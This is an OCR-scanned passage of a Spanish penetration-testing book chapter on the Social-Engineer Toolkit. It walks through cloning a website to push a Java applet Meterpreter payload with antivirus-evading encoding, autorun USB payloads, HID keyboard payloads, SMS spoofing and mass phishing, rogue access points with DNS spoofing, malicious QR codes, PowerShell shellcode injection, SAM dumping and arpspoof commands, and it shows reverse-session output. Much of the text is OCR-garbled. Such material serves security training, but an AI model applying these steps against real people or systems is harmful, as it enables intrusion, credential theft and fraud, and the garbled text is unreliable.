t  f ]  Website  Attack  Vectors  [ i  ] 

1.  Web  Templates 

2.  Site  Clone- 

3.  Custom  Import 

4.  Return  to  main  menu 

Enter  number  (1-4):  2 

SET  supports  both  HTTP  and  HTTPS 

Example:  http://www.thisisafakesite.com 

Enter  the  url  to  elope:  http://infonnatica64.coni 

Fig  6.  I  5:  Clonacion  de!  sitio  web  de  lutbrmalica  64 

Una  vez  realizada  la  clonacion  de  la  pagina  web,  se  pedira  a!  usuario  de  SET  que  indique  que 
payload  quiere  utilizar  con  el  applet,  en  esta  prueba  en  concreto  se  utilizard  un  Meterpreter. 

Despues  de  la  eleccion  del  payload  se  pide  al  usuario  que  indique  un  encoder  para  intentar  evitar  la 
detection  de  un  posible  software  antimalware.  En  esta  prueba  de  concepto  se  utiliza  sh ikata_ga_nai, 
el  cual  realiza  cuatro  iteraciones  sobre  el  payload  para  ofuscar  su  contenido. 


Select  one  of  the  below,  'backdoored  executable'  is  typically  the  best. 

1.  avoid_utf8_tolower  (Normal) 

2.  shikataganai  (Very  Good)  , 

.  3.  alpha  mixed  (Normal) 

4.  alphaupper  (Normal) 

5.  call4_dword_xor  (Normal) 

6.  countdown  (Normal) 

7.  fnstenvjnov  (Normal) 

8.  jmp__call_additive  (Normal) 

9.  nonalpha  (Normal) 

16.  nonupper  (Normal) 

11.  Unicode  jnixed  (Normal) 

12.  unicodejipper  (Normal) 

13.  alpha2  (Normal) 

14.  No  Encoding  (None) 

15.  Multi- Encoder  (Excellent) 

16.  Backdoored  Executable  (BEST) 

Fig  6.16:  Eleccion  de  encoder  para  el  payload  que  Ianzara  el  applet  en  su  ejeeucion 

En  este  instante,  ya  se  tiene  conftgurado  el  servidor  web  con  la  pagina  que  Ianzara  el  applet  al 
sol  i  d  tar  el  recurso.  Cuando  una  vietima  en  potencia  solicite  el  recurso  vistializarauna  clonacion  de 
ia  pagina  web  de  lnformatica  64  y  a  la  vez  visualizara  un  pop-up  de  un  applet  de  JAVA  que  quiere 
ejecutarse.  I 


Si  la  vietima  elige  ejecutar  el  applet,  el  atacante  recibira  una  sesion  de  Meterpreter.  SET  se  encarg? 
de  confrgurar  el  modulo  exploit/multi/handler  para  recibir  las  sesiones  de  Meterpreter. 


Fig  6. 17:  Visualizacion  del  sitio  web  malicioso  con  el  applet  visible 
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resource  (src/progra!»junk/nieta_config)>  exploit  -j 
[*]  Exploit  running  as  background  job. 

[Bsf  exploitthamller)  > 

(*]  Started  reverse  handler  on  0,6.6.6:443 
[*]  Starting  the  payload  handler... 

(»]  Sending  stage  (752128  bytes)  to  192.168.1.35 

{*)  Heterpreter  session  1  opened  (192.168.1.40:443  ->  192.168.1.35:1393)  at  2612-09-15  17:13:47 
+0200 


Fig  6.18:  Sesion  de  Meier  prefer  oblenida  a  leaves  del  applet  de  JAVA 


5.  Medios  infectados 

Este  vector  de  ataqiie  es  uno  de  los  mas  simples  y  mas  efectivos,  siempre  y  cuando  se  lenga  conlacto 
fisico  con  la  victima.  La  idea  es  general*  un  payload  con  tin  fichero  de  autornn,  los  cuales  se  deben 
instalar  en  un  dispositive  externo  como  un  pendrive  o  CD/DVD.  Cuando  la  vlctima  inserle  este 
medio  en  su  equipo  se  auto  ejecutara  el  payload  comprometiendo  la  segiiridacl  del  equipo. 

Este  vector  de  ataque  dispone  de  dos  opciones  en  el  momenta  de  crear  el  ejecutable: 

-  File-Formal  Exploits.  Se  genera  un  archivo  con  un  fonnato  en  concrete,  por  ejemplo 
PDF,  RAR,  RTF,  con  el  objetivo  de  hacer  creer  a  la  vlctima  que  es  un  archivo  inofensivo. 

-  Standard  Metasploit  Executable.  Equivalente  a  los  ejecutables  que  se  crean  con 
msfpayload \  comentada  anteriormente  en  este  libro.  Si  la  variable  UPX_EMCODB  se 
encuentra  configurada  a  on  y  la  variable  UPXJPATH  indica  la  ruta  donde  se  encuentra  el 
ejecutable  de  UPX,  se  empaquetara  con  este  packer. 


1.  Windows  Reverse  TCP  Shell 
ker. 

2.  Windows  Heterpreter  Reverse  TCP 
ttacker. 

3.  Windows  Reverse  VNC  DLL 


Spawn  a  command  shell  on  victim  and  send  back  to  attac 
Spawn  a  meterpreter  shell  on  victim  and  send  back  to  a 
Spawn  a  VNC  server  on  victim  and  send  back  to  attacker 


4.  Windows  Reverse  TCP  Shell  (x64)  Windows  X64  Command  Shell,  Reverse  TCP  Inline 

5.  Windows  Heterpreter  Reverse_TCP  (X64)  Connect  back  to  the  attacker  (Windows  x64),  Meterprete 
r 

6.  Windows  Shell  BindJCP  (X64)  Execute  payload  and  create  an  accepting  port  on  remote 

system. 

7.  Windows  Heterpreter  Reverse  HTTPS  Tunnel  communication  over  HTTP  using  S5L  and  use  Meter 
preter 

Enter  the  payload  you  want  (press  enter  for  default):  2 
Enter  the  port  to  connect  back  on  (press  enter  for  default): 

[*]  Defaulting  to  port  443...  1 

{*]  Generating  fileformat  exploit... 

{*]  Payload  creation  complete. 

(*j  All  payloads  get  sent  to  the  src/program  junk/template.pdf  directory 
([*]  Your  attack  has  been  created  in  the  SET  home  directory  folder  “autorun" 

[*]  Copy  the  contents  of  the  folder  to  a  CD/DVD/USB  to  autorun. 


Do  you  want  to  create  a  listener  right  now  yes  or  no: 


Fig  6.19:  Generation  de  File-Formal  Exploit 


En  la  imagen  anterior  se  puede  visualizar  un  ejemplo  de  como  se  genera  un  archivo  con  tin  fonnato 
concrete.  Como  se  menciono  anteriormente,  tambien  se  crea  un  archivo  autorun  con  el  que  se 
provocara  la  ejecucion  autqmatica  at  introducir  el  medio  externo,  por  ejemplo  el  pendrive. 

El  fichero  autorun  que  se  crea  automaticaniente  se  locaiiza  en  la  mt-d/pentest/exploits/set/aulorun. 
En  la  imagen  se  puede  visualizar  el  contenido  y  la  localizacion  de  este  archivo. 


root@bt:/p8ntsst/exploits/set/autoni«#  cat  autorun. inf 

[autorun] 

open-tei8plate.pdf 

icon=8utorun.icoroot@bt:/pentest/explo.its/set/autovun#  cd  . . 
raotght : / psntest/exptoits /sot#  g _ 

Fig  6.20:  Conlenido  del  lichero  autorun 

Cuando  se  genera  un  ejecutable  standard  de  Metasploit  se  obtiene  un  archivo  EXE  denominado 
program. exe  y  el  archivo  autonm.inf  el  cuai  provocara  la  ejecucion  automatica  del  archivo  EXE.  La 
ruta  donde  se  aloja  es  la  misrna  que  la  que  se  comento  anteriornienLe:  /p<?/j/e.y//e.v/;/o//.sv4YVAu//o;7///. 


6.  Payloads  como  ejecutables 

Esta  opcion  es,  realmente,  similar  a  la  anterior  salvo  que  simplemente  genera  el  ejecutable 
malicioso.  El  usuario  o  atacanle  debera  buscar  la  via  para  hacer  que  la  victims  ejecute  el  archivo 
ejecutable  creado.  Esta  opcion  es  equivalente  a  la  herramienta  msfpayload,  con  la  que  se  pueden 
crear  ejecutables,  lanto  para  sistemas  Windows  como  Linux. 

Ademas,  los  payload  disponibles  son  tanto  para  arquitecturas  de  32  como  de  64  bits.  Este  hecho 
hace  que  se  abarque  gran  cantidad  de  maquinas  jnodernas  y  antiguas.  Tambien  es  interesante  la 
opcion  de  la  conexion,.  tanto  inversa  como  directa,  con  las  bind  shell  o  reverse  shell. 

En  este  libro  se  han  reaiizado  diversos  ejemplos  con  la  herramienta  msfpayload,  e  incltiso  se  hail 
coiistruido  ejecutables  mediante  SET  con  la  opcion  del  apartado  anterior  “Medios  infectados”.  Para 
crear  un  ejecutable  malicioso  con  SET  mediante  esta  opcion  simplemente  se  debe  eiegir  el  payload 
que  se  quiere  inyectar  al  fichero  ejecutable  o  binario  e  ir  indicando  las  posibles  opciones,  como  es  la 
direccion  IP  a  la  que  se  conectara  tras  la  ejecucion  del  payload. 


1.  Dispositivos  USB  HID 

Los  dispositivos  HID,  Human  Interface  Device ,  son  ulilizados  para  utilizar  entradas  al  sislcma  que 
estan  reservadas  para  los  usuarios,  y  ademas  pueden  devolver  una  salida  tambien  para  estos.  Este 
tipo  de  dispositivos  se  utiliza  sobre  la  tecnologia  USB,  ejemplos  de  ellos  son  teclados,  ralones, 
etcetera. 
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El  vector  de  ataque  utilizado  aqiif  es  una  combination  de  hardware  persona  lizado  y  derivation  de 
restriction  a  traves  de  emulacidn  de  leclado.  Es  muy  comun,  que  los  dispositivos  extemos,  como  son 
!os  DVD  o  los  USB,  no  dispongan  de  privilegios  para  realizar  la  ejecucion  automatica.  Es  deck  rg 
se  ejecuta  el  archive  autorun. inf,  por  lo  que  no  se  puede  ejecutar  e!  codigo  de  forma  automatizada. 

El  objefivo  de  este  vector  de  ataque  es  que  utilizando  un  dispositivo  HID  USB,  se  pueda  emular 
un  teclado  o  un  raton.  Cuando  se  inserte  el  dispositivo,  este  se  detectara  por  el  sistema  como  un 
dispositivo  de  interfaz  humana.  Utilizando  el  microprocesador  y  la  mentor m  flash  incorporada  en  el 
dispositivo  se  pueden  enviar  puisaciones  rapidas  de  teclas  a  la  maquina  victima  y  comprometerla. 
Hay  que  disponer  de  un  dispositivo  de  este  tipo  para  poder  juntarlo  con  SET  y  lograr  los  objetivos. 

Se  debe  seleccionar  la  option  numero  seis  en  el  menu  de  SET,  obteniendo  as!  una  lista  de  payload v 
para  generar  los  archivos  PDE  que  seran  cargados  o  importados  a  los  dispositivos  HID  USB.  Este 
vector  utiliza  scripts  en  PowerShelt ,  WScripts  y  otros  tipos  de  tecnicas  interesantes,  como  es  la 
desearga  del  payload  a  traves  de  metodos  wget. 


Select  a1  payload  to  create  the  pde  file  to  import  into  Arduino: 

1.  Powershell  HTTP  GET  MSF  Payload 

2.  WSCRIPT  HTTP  GET  MSF  Payload 

3.  Powershell  based  Reverse  Shell  Payload 

4.  Internet  Explorer/FireFox  Beef  Jack  Payload 

5.  Go  to  malicious  java  site  and  accept  applet  Payload 

6.  Gnome  wget  Download  Payload 

7.  Return  to  the  main  menu. 

Enter  your  choice: 

Fig  6.2 1 :  Listado  de  payloads  para  la  gcneracion  de  archivos  PDE 


8.  Ataques  por  correo  electronico 

Este  vector  de  ataque  pertenece  a  la  tecnologia  del  correo  electronico  con  el  que  se  pueden  realizar 
envios,  ya  scan  dingidos  o  masivos.  Este  vector  proporciona  distintos  metodos  para  iievar  a  cabo 
dicha  accion,  utihzandose  principalmente  para  su  iitilizacion  en  el  campo  de  la  ingeniena  social. 

Eti  la  primera  opcion  que  se  ofrece  se  debe  indicar,  sencillamente,  la  direccion  de  correo  electronico 
dc  la  victima.  Se  podra  utilizar  una  cuenta  de  Gmail  para  realizar  la  accion  maliciosa  o  la  herramienla 
sendmail.  Es  posible  emplear  codigo  HTML  o  directamente  enviarse  como  texto  piano. 

En  la  segunda  opcion  se  debe  indicar  el  fichero  que  contiene  las  direccicnes  de  correo  electronico 
a  las  que  se  quiere  realizar  el  envio  masivo.  Tambien  se  puede  utilizar  una  cuenta  de  Gmail  o  la 
apl  icacion  sendmail. 

El  envio  masivo  permite  realizar  acciones  de  SPAM,  las  cuales  son  potencialniente  peligrosas,  e 
incluso  en  algunos  paises  ilegales.  Este  vector  de  ataque  debe  ser  ejecutado  de  manera  controlada 
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por  el  usuario  o  auditor,  ya  que  con  el  envio  masivo  se  puede  perder  el  control  de  las 
manera  sencilla. 


\ 

acciones  de- 


9,  Falsificacion  de  SMS 

Este  vector  de  ataque  es  realmente  especial,  ya  que  permite  spoofear  ei  emisor  de  tin  mensaje  SMS? 
Cuando  la  victima  reciba  el  SMS  aparece  como  emisor  otro  numero  distinto  al.  original,  con  esto  es( 
posible  realizar  ataques  via' SMS. 

t 

Se  pueden  utilizar  distintas  opciones  en  el  menu  de  dicho  vector  ademas  de  crear  o  personalizar  las, 
plant! lias  para  los  mensajes.  Este  vector  da  la  oportunidad  de  realizar  ingenieria  social  a  traves  del 
servicio  movil  de  los  mensajes  cortos.  Serla  posible  por  ejemplo  mandar  un  link  haciendose  pasar< 
por  un  banco  solicitando  las  credenciales  del  usuario.  ^ 

Una  vez  que  se  selecciona  la  opcion  anterior  se  visualiza  que  existe  un  ataque  dirigido  a  un  solo! 
numero  de  telefono  o  la  posibilidad  de  realizar  un  ataque  masivo. 


This  module  was  created  by  the  team  at  TB- Seen rity.com. 

You  can  use  a  predefined  template,  create  your  own  template  or  specify 
an  arbitrary  message.  The  main  method  for  this  would  be  to  get  a  user’ to 
click  or  coax  them  on  a  link  in  their  browser  and  steal  credentials  or  perform 
other  attack  vectors; 

1.  Perform  a  SMS  Spoofing  Attack 

2.  Create  a  Social -Engineering  Template 

3.  Return  to  Main  Menu  1 

Enter  your  choice:  1 
SMS  Attack  Menu 

There  are  diferent  attacks  you  can  launch  in  the  context  of  SMS  spoofing, 
select  your  own. 

What  do  you  want  to  do: 

1.  SMS  Attack  Single  Phone  Number 

2.  SMS  Attack  Mass  SMS 

3.  Return  to  SMS  Spoofing  Menu 

Fig  6.22:  Menu  de  sms  spoofing 

Los  servicios  para  el  envio  de  SMS  suelen  ser  paginas  web  de  pago.  Pero  es  interesante  disponer  de 
una  cuenta  de  usuario  y  poder  probar  este  tipo  de  ataque,  ya  que  los  usuarios,  hoy  en  dla,  no  piensan 
que  estas  tecnicas  sean  utilizadas  en  la  realidad. 
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10.  Vector  de  ataque:  Wireless 

Este  vector  es  imo  de  ios  mas  interesantes  ya  que  presenla  la  posibilidad  de  crear  un  punto  de  acceso 
falso,  que  sirnule  una  red.  Este  punto  de  acceso  proporciona  DHCP  y  DNS,  servicios  manipulados 
por  el  atacante  para  repartir  las  direeciones  IP  e  rndicar  c-ual  es  la  direccion  IP  del  servidor  DNS,  y 
la  direccion  IP  del  router. 

Es  total  men  le  factible  pensar  que  se  puede  otorgar  a  la  vlctima  la  direccion  IP  de  la  maquina  del 
atacante  como  puerta  de  enlace,  esto  hara  que  todo  el  trafico  de  la  vlctima  circule  a  travds  de  aquelia. 

Otra  de  las  posibilidades  es  utilizar,  y  asi  lo  hace  SET,  la  tecnica  DNS  Spoofing  para  conseguir  que 
cuando  la  vlctima  solicite  un  recurso  de  un  dominio,  se  le  redirija  a  un  servidor  web  que  tenga  el 
atacante  con  un  sitio  web  similar  al  original. 

Hay  que  teuer  en  cueiita  la  ruta  donde  se  encuentran  las  aplicaciones  dnsspoof  y  airbase-ng,  ya  que 
SET  las  utilizara.  En  la  imagen  se  puede  visualizar  como  mediante  el  uso  del  comando  whereis  se 
puede  locatizar  la  ruta  de  la  aplicacion  buscada. 

root(§bt:/pentest/exploits/set#  whereis  airbase-ng 
airbase-ng:  /usr/local/sbin/airbase-ng 
root@bt:/pentest/ex|)loits/set#  whereis  dnsspoof 
dnsspoof:  /usr/local/sbin/dnsspoof 
rootlbt : /pentest/exploits/set# 

Pig  6.23:  Ruins  de  las  aplicaciones  dnsspoof  y  airbase-ng 

Con  cualquier  editor  de  texto  se  debe  modificar  el  fichero  sei_conjig  en  caso  de  no  encontiarse 
bien  definidas  las  variables  especificadas  anteriormente.  Como  se  puede  visualizar  en  la  imagen,  se 
pueden  encontrar  las  variables  al  final  del  archivo  de  configuracion  de  SET. 

»  THIS  FEATURE  WILL  AUTO  EMBED  A  IMG  SRC  TAG  TO  A  UNC  PATH  OF  YOUR  ATTACK  MACHINE. 

#  USEFUL  IF  YOU  WANT  TO  INTERCEPT  THE  HALF  LM  KEYS  WITH  RAINB0WTABLE5.  WHAT  WILL  HAPPEN 

#  IS  AS  SOON  AS  THE  VICTIM  CLICKS  THE  WEB -PAGE  LINK,  A  UNC  PATH  WILL  BE  INITIATED 

#  AND  THE  METASPLOIT  CAPTURE/SMB  MODULE  WILL  INTERCEPT  THE  HASH  VALUES. 

UNCEMBED^OFF 

# 

#  THIS  FEATURE  WILL  ATTEMPT  TO  TURN  CREATE  A  ROGUE  ACCESS  POINT  AND  REDIRECT  VICTIMS  BACK  TO  THE 

#  SET  WEB  SERVER  WHEN  ASSOCIATED.  AIRBASE-NG  and  DNSSPOOF. 

ACCESS  POINT_SSID*Unksys 
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng 

DNSSPOOF  PATH-/tisr/local/sbin/dnsspoof 

#  _ _ _ — _  . 

Fig  6.24:  Modification  de  Ios  valores  dnsspoof  y  airbase 

La  opcion  para  seleccionar  este  vector  en  el  menu  de  SET  es  la  numero  ocho,  denominada  Wireless 
Access  Point  Attack  Vector”.  Tras  la  eleccion  de  esta  opcidu  se  pedira  al  usuario  que  seleccione  entre 
arrancar  el  punto  de  acceso  o  detenerlo. 


Welcome  to  the  Wireless  Attack  Vector,  this  will  create  an  access  point  leveraging 
your  wireless  card  and  redirect  all  DNS  queries  to  you.  The  concept  is  fairly  simple, 

SET  will  create  a  wireless  access  point,  dhcp  server,  and  spoof  DNS  to  redirect  traffic 
to  the  attacker  machine..  It  will  then  exit  out  of  that  menu  with  everything  running  as 
a  child  process. 

You  can  then  launch  any  SET  attack  vector  you  want,  for  example  the  Java  Applet  attack  and 
when  a  victim  joins  your  access  point  and  tries  going  to  a  website,  will  be  redirected  to 
your  attacker  machine. 

This  attack  vector  uses  AirBase-N6,  AirHon-NG,  DNSSpoof,  and  dhcpd3  to  work  properly. 

What  do  you  want  to  do: 

1.  Start  the  SET  Wireless  Attack  Vector  Access  Point 

2.  Stop  the  SET  Wireless  Attack  Vector  Access  Point 

3.  Return  to  the  SET  main  menu. 

Enter  your  choice:  _ _ 

Fig  6.25:  Arrancando  el  punlo  de  acceso  con  SET 

Tras  ejecutar  dicha  opcion  se  puede  visualizar  como  se  empieza  a  preparar  el  enlorno  para  generar  el 
punto  de  acceso  falso.  En  la  siguierite  imagen  se  pueden  visualizar  dichas  acciones. 


1.  Start  the  SET  Wireless  Attack  Vector  Access  Point 

2.  Stop  the  SET  Wireless  Attack  Vector  Access  Point 

3.  Return  to  the  SET  main  menu. 

Enter  your  choice:  1 

Enter  the  wireless  network  interface  lex.  wlane):  metasploit_i64 
![*]  Placing  card  in  monitor  mode  via  airmon-ng.. 


Found  2  processes  that  could  cause  trouble. 

If  airodump-ng,  aireplay-ng  or  airtun-ng  stops  working  after 
a  short  period  of  time,  you  may  want  to  kill  (some  of)  them! 

PIO  Name 

784  dhclient3 

3295  dhclient3 

Process  with  PID  3295  (dhclient3)  is  running  on  interface  wlano 


Interface  Chipset  Driver 

wlanO  Ralink  2573  USB  rt73usb  -  IphyS] 

mono  Ralink  2573  USB  rt73usb  -  (phyDj 

(*]  Spawning  airbase-ng  in  a  seperate  child  thread... 

(*]  Sleeping  15  seconds  waiting  for  airbase-ng  to  complete... 


Fig  6.26:  Configuracion  del  AP  falso 
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11.  Vector  de  ataque  QRCode 

lil  vector  de  ataque  para  la  generacion  de  QRCode  pemiite  al  usuario  crear  este  tlpo  de  i mage nes  que 
pueden  ser  Ieidas  e  interpretadas  por  apiieaciones  moviles.  El  objetivo  de  estos  codigos  soil  las  de 
enlazar,  por  ejemplo,  sitios  web.  La  i  ngenieria  social  mediante  el  uso  de  QRCode  propone  utilizarlos 
para  publiear  dichas  imagenes  en  el  mayor  numero  de  sitios,  es  decir  de  fonria  masiva,  y  conseguir 
que  los,  cada  vez  mas,  usuarios  de  smartphones  puedan  caer  en  la  trampa. 

Generalmente,  despues  de  un  QRCode  malicioso  se  encuentra  un  sitio  web,  el  cual  tambien  podna 
ser  montado  con  SET  con  la  opcion  “ Website  Attack  Vectors”.  Por  ejemplo,  se  podria  util izar  el 
ataque  del  applet  de  JAVA  unido  a  que  la  vlctima  accediera  al  sitio  a  traves  de  un  QRCode. 

May  que  lecalcar  que  este  vector  de  ataque  no  se  encuentra  disponible  en  la  mavorfa  de  versiones 
de  SET,  es  una  de  las  ultimas  funcionalidades  afiadidas  al  toolkit ,  junto  a!  vector  de  ataque  de 
PowerSheil.  En  este  apartado  se  ha  utilizado  la  distribution  de  BackTrack  5  R3,  la  cual  lue  liberada 
a  mediados  del  ano  2012. 


PoC:  Ingenieria  social  con  un  QRCode  malicioso 

En  la  siguiente  prueba  de  concepto  se  utilizara  la  posibilidad  de  generar  QRCode  a  traves  de  SET 
para  enlazar  a  un  usuario  con  un  sitio  web  malicioso.  El  escenario  montado  es  en  una  red  local, 
donde  todo  dispositive  se  encuentra  controtado,  habrla  que  imaginar  dicho  escenario  en  Internet.  El 
atacante  dispondria  de  un  servidor  web  y  para  hacer  que  las  posibles  victimas  accediesen  a  dicho 
recurso  se  utilizarian  estos  codigos. 

En  primer  lugar,  y  tras  arrancar  SET,  se  debe  seleccionar  la  opcion  nueve  “ QRCode  Generator 
Attack  Vector”. 
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Directamehte  se  presenta  la  opcion  de  introducir  para  que  direccion  URL  se  generard  un  QRCode 
En  esta  prueba  de  concepto  se  utiliza  una  direccion  IP,  pero  en  un  escenario  real,  es  posible  que 
atacante  haya  adquirido  un  dominio  falso,  parecido  al  sitio  web  real  para  conflmdir  a  las  posibles  \| 
potenciales  victimas.  ^ 

— - - - — . .  .  .  . _ _ _ \ 

The  QRCode  Attack  Vector  will  create  a  QRCode  for  you  with  whatever  URL  you  want. 

When  you  have  the  QRCode  Generated,  select  an  additional  attack  vector  within  SET  and 
deploy  the  QRCode  to  your  victim.  For  example,  generate  a  QRCode  of  the  SET  Java  Applet 
and  send  the  QRCode  via  a  mailer.  y 

Enter  the  URL  you  want  the  QRCode  to  go  to;  http://i92.168. 1,38 
lU  [*j  QRCode  has  been  generated  under  reports/qrcode  attack. pnq' 

QRCode  generated. 

Press  <return>  to  continue 

Hg  6.28:  Generacion  de  un  QRCode  malicioso 

La  imagen  es  almacenada  en  la  ruta  /pentest/exploils/set/reports/ en  formato  PNG.  Esta  irnagen  sera 
coiocada  en  otros  sitios  web  o  mandada  via  mail  para  conseguir  que  las  victimas  tras  la  lectura  del 
QRCode  se  conecten  al  servidor  web  malicioso.  Hay  que  recordar  que  existen  lectores  QRCode  que 
no  informan  del  recurso  al  que  se  conectan,  es  decir  automaticamenle  intentan  acceder  al  recurso  al 
que  apunta  el  QRCode.  En  la  imagen  se  puede  visualizar  el  QRCode  generado  gracias  al  uso  de  SET. 


Fig  6.29:  QRCode  generado  eon  SET 


12,  Vector  de  ataque  PowerShell 

Este  vector  de  ataque  que  proporciona  SET  permite  ai  usuario  crear  pequenos  scripts  que  seran 
ejecutados  en  una  maquina  vlctima  con  el  objetivo  de  obtener  una  sesion  inversa  o  directa.  Ademas, 
existe  la  posibilidad  de  realizar  un  volcado  de  SAM  a  traves  de  estos  scripts,  pero  requiere  ser 
SYSTEM m  el  sistema. 

En  la  imagen  se  pueden  visualizar  las  vlas  para  generar  este  tipo  de  scripts. 
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The  PowersheU  Attack  Vector  module  allows  you  to  create  PowersheU  specific  attacks.  These  atta 
cks  will  allow 

you  to  use  PowerShell  which  is  available  by  default  in  all  operating  systems  Windows  Vista  and  a 
bove.  PowerShell 

provides  a  fruitful  landscape  for  deploying  payloads  and  performing  functions  that  do  not  get 
triggered  by 

preventative  technologies. 

1)  PowersheU  Alphanumeric  Shellcode  Injector 

2)  PowersheU  Reverse  Shell 

3)  PowersheU  Bind  Shell 

4)  PowersheU  Dump  SAM  Database 

99)  Return  to  Main  Menu 

Fig  6.30:  Menu  con  las  posibilidades  del  vector  de  ataque  de  PowerShell 

Algunos  de  los  mas  interesanles  son  el  de  dumpeo  del  fichero  SAM,  la  cuai  es  la  opcion  mirnero 
cuatio,  o  la  shell  inversa  que  proporciona  una  shell ,  creando  previaniente  un  listener  en  la  maquina 
del  atacante.  Este  listener  sera  creado  con  ei  handler  exploit/mulli/handler,  por  ejemplo. 

PowerShell  es  fa  llnea  de  comandos  que  viene  por  defecto  en  sistemas  operatives  Microsoft  Windows 
desde  la  version  Vista.  El  alacante  ciebe  buscar  el  metodo  o  via  para  conseguir  que  la  victima  ejecute 
dicho  script. 


PoC:  Inyeccion  de  Meterpreter  a  traves  de  PowerShell 

En  este  escenario  se  proponen  dos  vias  de  explotacion.  Laprimera  via  es  que  el  atacante  dispone  de 
acceso  fisico  a  la  maquina  en  la  que  se  quiere  realizar  la  explotacion,  y  posee  un  script  encodeado 
con  el  que,  teas  ejecutar  una  PowerShell  se  reahzara  la  subida  de  un  Meterpreter  a  la  maquina 
victima.  La  segunda  via  propuesta  es  que  el  atacante  engaiie  a  la  viclima.  mediante  ingenieria  social, 
para  que  ejecute  el  script. 


1)  PowersheU  Alphanumeric  Shellcode  Injector 

2)  PowersheU  Reverse  Shell 

3)  PowersheU  Bind  Shell  I 

4)  PowersheU  Dump  SAM  Database 

99)  Return  to  Main  Menu 


set>  IP  address  for  the  payload  listener:  192.168.1.38 

!*i  Prepping  the  payload  for  delivery  and  injecting  alphanumeric  shellcode... 

Enter  the  port  number  for  the  reverse  (443]:  4444 

IM  Generating  x64-based  powershell  injection  code... 

(’]  Generating  x86-based  powershell  injection  code... 

Finished  generating  powershell  injection  attack  and  is  encoded  to  bypass  exe 
cution  restriction... 

sel>  Do  you  want  to  start  the  listener  now  [yes/no]:  ;  yes 

5et:powersheU>  Select  xB6  or  x64  victim  machine  [default:  x64l: _ 

Fig  6.3 1 :  Generation  del  script  para  la  inyeccion  en  sistemas  Windows 


En  primer  lugar  se  utilizara  la  opcion  numero  uno  de  este  vector  de  ataque  denominada  “PowcrShell 
Alphanumeric  Shellcode  Injector”.  Se  puede  generar  para  sistemas  de  32  o  64  bits.  A1  fmalizar  este 
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proceso  se  crea  un  archive  TXT  en  la  ruta  fpentest/ exploits/ set/reports,  el  codigo  generado  en  e[ 
fichero  es  el  que  se  debe  ejecutar  en  la  maquina  victima.  Se  puede  convertir  este  TXT  en  tm  script  o 
diieclamente  eopiar  el  codigo  en  una  PowerShell  y  ejecutarlo. 

Una  vez  que  se  ejecute  el  script  en  la  maquina  victima,  el  handler  que  se  configura  aulomatieamente 
recibira  la  sesion  de  Meterpreter  otorgando  el  control  de  la  maquina  remota  al  atacante.  En  este  punto 
se  podrlan  ulilizar  todas  las  opciones  estudiadas  en  el  capitulo  de  Meterpreter  y  post-explotucidn. 

liisf  exploit  (handler)  >  ~  “ — - — : - - - - - - 

{*3  Started  reverse  handler  on  8.0.0.0:4444 
1*3  Starting  the  payload  handler... 

1*3  Sending  stage  (951296  bytes)  to  192.168.1.37 

2*^0400er*)reter  SeSS*°n  1  °Pened  (192.168.1.38:4444  ->  192.168.1.37:49299}  at  2012-09-22  15:09:5 
msf  exploit (handier)  >  sessions  -i 


Active  sessions 


Id  Type 


Information 


Connection 


1  meterpreter  x64/win64  pablo- vm\pablo  @  PABLO-VM  192.168.1.38:4444  ->  192.168.1.37:49299 
( 192 . 168 » i , 37} 

msf  exploit (handler)  > 

Fig  6.32  Recepci6n  de  la  sesion  de  Meterpreter  Iras  la  ejecuci6n  del  script  de  PowerShei! 

Actual  men  te  este  metodo  es  uno  de  los  mas  favorabies  para  evitar  a  los  sistemas  antivirus,  debklo  a 
que  ei  codigo  va  encodeado  y  es  una  via  muy  novedosa.  En  la  imagen  se  puede  visualizar  el  aspecto 
que  tiene  el  script  generado  y  los  parametros  necesarios,  los  cuales  soji  generados  tambien  por  SET, 
para  su  ejecueion. 


Ittindous  PouerShell  4- 

Copyright  <C>  2009  Hiqrgsoft  Corporation.  Reseruados  todos  los  derecims. 


Fig  6.33:  Ejecucibn  del  ataque  en  una  sesion  MPowerShell 


13.  PoC:  EI  mundo  del  spooling  y  SET 

En  esta  prueba  de  concepto  se  presenta  un  escenario,  facilmente  reproducible  en  cualquier  empresa, 
en  un  de  red  de  area  local.  El  ataque  consiste  en  el  uso  de  tecnicas  como  ARP  spoofing  y 
DNS  spoofing  para  controlar,  tanto  el  trafico  de  la  victima  como  los  sitios  web  a  los  que  esta  accede. 
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El  escenario  esta  compuesto  por  las  siguientes  maquinas  y  roles: 

En  primer  lugar,  el  atacante  dispone  de  una  BackTrack  5  con  la  que  ejecutara  la  aplicacion 
arpspoof  para  realizar  un  ataque  Man  In  The  Middle  a  la  vlctima. 

-  El  usuario  vlctima,  el  cual  se  encuentra  en  la  misma  red  local  que  ei  atacante,  utiliza  una 
maquina  Windows  7. 


Como  se  ha  mencionado  anteriormente,  primero  hay  que  conseguir  que  la  vlctima  crea  que  el  router 
es  el  atacante,  es  decir,  cuando  realice  peticiones  a  Internet,  estas  se  envlen  primero  a  la  maquina 
del  atacante,  Para  lograr  esto  se  utiliza  la  herramienta  arpspoof  con  ia  que  se  consigue  envenenar  la 
labia  ARP  de  la  maquina  vlctima. 

La  sintaxis  de  arpspoof  es  sencilla,  se  debe  indicar  la  interfaz  por  la  que  se  enviaron  los  arp  reply  y 
los  target.  Un  ejemplo  es  arpspoof —i  eth()—t  <mdquina  victima>  <router>,  puede  interesar  obtener 
un  envenenamiento  doble  ejecutando  en  otra  shell  la  instruccion  arpspoof  -i  ethO  -t  <routcr> 
<mdquina  victima> . 


root@bt:~#  arpspoof  -i  ethe  -t  192. 168.  L37  192.168.1.1 

8 : 0 : 27 : d5 : 8C : 35  8 ; 0 : 27 : Id : be : 5a  0806  42:  arp  reply  192.168.1.1  is-at  8 : 8 : 27 : d5 : 8c : 35 

8:0:27:d5:8c:35  8:0:27:ld:be:5a  0806  42:  arp  reply  192,168.1.1  is-at  8 : 0 : 27 : d5 : 8c : 35 

8:0:27:dS:8c:3S  8 : 0 : 27 : Id : be : 5a  0806  42:  arp  reply  192.168.1,1  is -at  8 : 0 : 27 : d5 : 8c : 35 

8 : 0 : 27 : d5 : 8c : 35  8 : 0 : 27 : Id : be : 5a  0806  42:  arp  reply  192.168.1,1  is-at  8 : 0 : 27 : d5 : 8c : 35 

QlQl77;d5:8c:35  8:B:27:ld:be:5a  6896  42:  arp  reply  192.168,1.1  is-at  8 : 8 : 27 : d5 : 8c : 35 

Fig  6.34:  Envenenamiento  cte  la  maquina  vlctima 

No  hay  que  olvidar  que  para  que  una  maquina  Linux  trabaje  como  enrutador  se  debe  modificar  el 
